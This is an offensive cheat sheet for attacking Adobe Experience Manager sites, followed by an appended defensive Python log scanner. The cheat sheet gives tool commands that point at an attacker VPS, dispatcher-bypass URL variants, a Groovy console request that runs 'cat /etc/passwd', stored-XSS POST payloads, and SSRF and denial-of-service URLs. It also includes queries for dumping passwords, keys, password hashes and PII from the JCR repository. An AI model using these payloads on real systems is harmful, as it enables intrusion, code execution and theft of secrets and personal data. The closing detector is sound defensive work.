AEM misconfiguration

  • Collect subdomain

  • Use nuclei/nuclei-templates/technologies/tech-detect.yaml to identify AEM

  • Run python3 ./aem_hacker.py -u https://example --host localhost

  • Use AEM Paths to fuzz on paths

  • python3 aem_hacker.py -u --host yourvpshostname => common usage

  • python3 aem_discovery.py --file urls.txt --workers 150 => discover URLs

  • python3 aem_enum.py --url => automate username and secrets grabbing

  • python3 aem_ssrf2rce.py --url --fakaem yourvps

  • python3 aem_server.py

  • Bypassing CVE-2016-0957

    • https://aemsite/bin/querybuilder.json => blocked

    • https://aemsite/bin/querybuilder.json/a.css => allow

    • https://aemsite/bin/querybuilder.json/a.html => allow

    • https://aemsite/bin/querybuilder.json/a.ico => allow

    • https://aemsite/bin/querybuilder.json/a.png => allow

    • https://aemsite/bin/querybuilder.json;%0aa.css => allow

    • https://aemsite/bin/querybuilder.json/a.1.json => allow

  • Bypassing for interesting servlets

    • https://aemsite/bin/querybuilder.json => blocked

    • https://aemsite/bin/querybuilder.json/a.css => blocked

    • https://aemsite/bin/querybuilder.json;%0aa.css => blocked

    • https://aemsite/bin/querybuilder.json.servlet.css => allow

    • https://aemsite/bin/querybuilder.json.servlet.html => allow

    • https://aemsite/bin/querybuilder.json.servlet.ico => allow

    • https://aemsite/bin/querybuilder.json.servlet.png => allow

    • ///etc.json instead of /etc.json

    • ///bin///querybuilder.json instead of /bin/querybuilder.json

  • SSRF should allow sending GET requests and seeing responses

    • Opensocial proxy

    • SSRF in ReportingServicesProxyServlet (CVE-2018-12809)

  • POST /bin/groovyconsole/post.servlet HTTP/1.1

    • HOST:

    • script=sef+proc+%3d+"cat+/etc/passwd".execute()%0d%0aprintln+proc.txt

  • POST //////content/usergenerated/etc/commerce/smartlists/vv.json

    • aa=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b

  • POST /content/usergenerated/etc/commerce/smartlists/xss

    • aaa.html=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b

  • POST /content/usergenerated/etc/commerce/smartlists/xssed

    • jcr:data=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b&jcr:mimeType=text/html

  • Everything is stored in the JCR repository:

    • Secrets (passwords, encryption keys, tokens)

    • Configuration

    • PII

    • Usernames

What to Use

  • DefaultGETServlet

  • QueryBuilderJsonServlet

  • QueryBuilderFeedServlet

  • GQLSearch Servlet

  • Others

  • DefaultGETServlet: allows getting a JCR node together with its properties

  • Selectors:

    • Tidy

    • Infinity

    • Numeric value: -1, 0, 1...99999

  • Formats:

    • JSON

    • XML

    • RES

  • Example:

    • https://aem.site/tidy.3.json

      • / => resource path (here jcr:root)

      • tidy => selector tidy

      • 3 => selector depth

      • json => output format

  • How to Grab:

    • Get node names, starting from jcr:root:

      • /.1.json

      • /.ext.json

      • /.childrenlist.json

    • Or guess node names:

      • Common names /content, /home, /var, /etc

    • Dump properties for each child node of jcr:root:

      • /etc.json or /etc.s.json or /etc.-1.json

  • What to Grab:

    • Interesting nodes:

      • /etc => may contain secrets (passwords, encryption keys)

      • /apps/system/config => passwords

      • /apps/<something>/config => passwords

      • /var => may contain private PII

      • /home => password hashes, PII

    • Interesting properties contain AEM usernames:

      • jcr:createdBy

      • jcr:lastModifiedBy

      • cq:LastModifiedBy

  • Path:

    • /bin/querybuilder.json

    • /bin/querybuilder.feed.servlet

  • Examples of Useful Searches:

    • type=nt:file&nodename=*.zip

    • path=/home&p.hits=full&p.limit=-1

    • hasPermission=jcr:write&path=/content

    • hasPermission=jcr:addChildNodes&path=/content

    • hasPermission=jcr:modifyProperties&path=/content

    • p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alastModifiedBy&property.operation=unequals&property.value=admin&type=nt%3abase&p.limit=1000

    • path=/etc&path.flat=true&p.nodedepth=0

    • path=/etc/replication/agents.author&p.hits=full&p.nodedepth=-1

  • SSRF via Opensocial Proxy:

    • /libs/opensocial/proxy?container=default&url=http://target

    • /libs/shindig/proxy?container=default&url=http://target

  • SSRF via ReportingServicesProxyServlet (CVE-2018-12809):

    • /libs/cq/contentinsight/content/proxy.reportingservices.json?url=http://target%23/apil.omniture.com/a&q=a

    • /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet?url=http://target%23/apil.omniture.com/a&q=a

    • /libs/mcm/salesforce/customer.json?checkType=authorize&authorization_url=http://target&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e

  • SSRF via SiteCatalystServlet:

    • /libs/cq/analytics/components/sitecatalystpage/segments.json.servlet

    • /libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json

  • /.ext.infinity.json

  • /.ext.infinity.json?tidy=true

  • /bin/querybuilder.json?type=nt:base&p.limit=-1

  • /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix=

  • /content.assetsearch.json?query=*&start=0&limit=10&random=123

  • /..assetsearch.json?query=*&start=0&limit=10&random=123

  • /system/bgservlets/test.json?cycles=999999&interval=0&flushEvery=111111111
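As an added example (not from these notes and not part of the aem_hacker tooling), a Python detection pass over access-log lines: it collapses the dispatcher-bypass spellings from the two "Bypassing" lists into one resource path and flags the enumeration, SSRF, DoS and usergenerated-write endpoints listed above. The finding labels, the sample log lines and the regexes are my own constructions.

```python
import re
from urllib.parse import unquote

# Resource paths taken from the notes above; the labels are my own wording.
SENSITIVE = {
    "/bin/querybuilder": "QueryBuilder servlet (JCR enumeration)",
    "/bin/wcm/search/gql": "GQL search servlet (JCR enumeration)",
    "/bin/groovyconsole": "Groovy console (script execution)",
    "/libs/opensocial/proxy": "Opensocial proxy (SSRF)",
    "/libs/cq/contentinsight": "ReportingServicesProxyServlet (SSRF, CVE-2018-12809)",
    "/system/bgservlets/test": "bgservlets test servlet (DoS)",
}
# DefaultGETServlet dump selectors, and direct dumps of the interesting roots (/content left out).
DUMP = re.compile(r"\.(tidy|infinity|-?\d+|childrenlist|ext|assetsearch)\.(json|xml)$")
ROOTS = re.compile(r"^/(etc|home|var|apps)(/[^/]+)*\.[^/]*(json|xml)$")
LOG = re.compile(r'"(?P<m>[A-Z]+) (?P<t>\S+) HTTP/[\d.]+"')

def normalize(target):
    """Reduce a raw target toward the path Sling resolves: drop query, decode, cut ';' params, squash '/'."""
    path = unquote(target.split("?", 1)[0])
    path = re.sub(r";[^/]*", "", path)   # /x.json;\na.css -> /x.json
    return re.sub(r"/{2,}", "/", path)   # ///bin///x.json -> /bin/x.json

def classify(method, target):
    """Label one request or return None. A prefix counts only at a Sling boundary (end,
    '.' selector/extension, '/' suffix), so every bypass spelling lands on the same finding."""
    path = normalize(target)
    for prefix, label in SENSITIVE.items():
        if path == prefix or path.startswith((prefix + ".", prefix + "/")):
            return label
    if method == "POST" and path.startswith("/content/usergenerated/"):
        return "anonymous write under /content/usergenerated (stored XSS)"
    if DUMP.search(path) or ROOTS.match(path):
        return "JCR dump via DefaultGETServlet"
    return None

def scan(lines):
    # Yield (normalized path, label) for every flagged access-log line.
    for line in lines:
        m = LOG.search(line)
        label = classify(m["m"], m["t"]) if m else None
        if label:
            yield normalize(m["t"]), label

# Constructed sample access-log lines (Apache combined format).
SAMPLE = [
    '1.2.3.4 - - [01/Jan/2024:10:00:00 +0000] "GET /content/site/en.html HTTP/1.1" 200 512',
    '1.2.3.4 - - [01/Jan/2024:10:00:01 +0000] "GET ///bin///querybuilder.json;%0aa.css?path=/home&p.hits=full HTTP/1.1" 200 9001',
    '1.2.3.4 - - [01/Jan/2024:10:00:02 +0000] "GET /.ext.infinity.json?tidy=true HTTP/1.1" 200 1000000',
    '1.2.3.4 - - [01/Jan/2024:10:00:03 +0000] "POST /content/usergenerated/etc/commerce/smartlists/vv.json HTTP/1.1" 201 0',
]
```

Matching on the normalized resource path rather than the raw URL string is also what a dispatcher or WAF rule needs to do; a glob on the literal `/bin/querybuilder.json` misses every variant in the lists above.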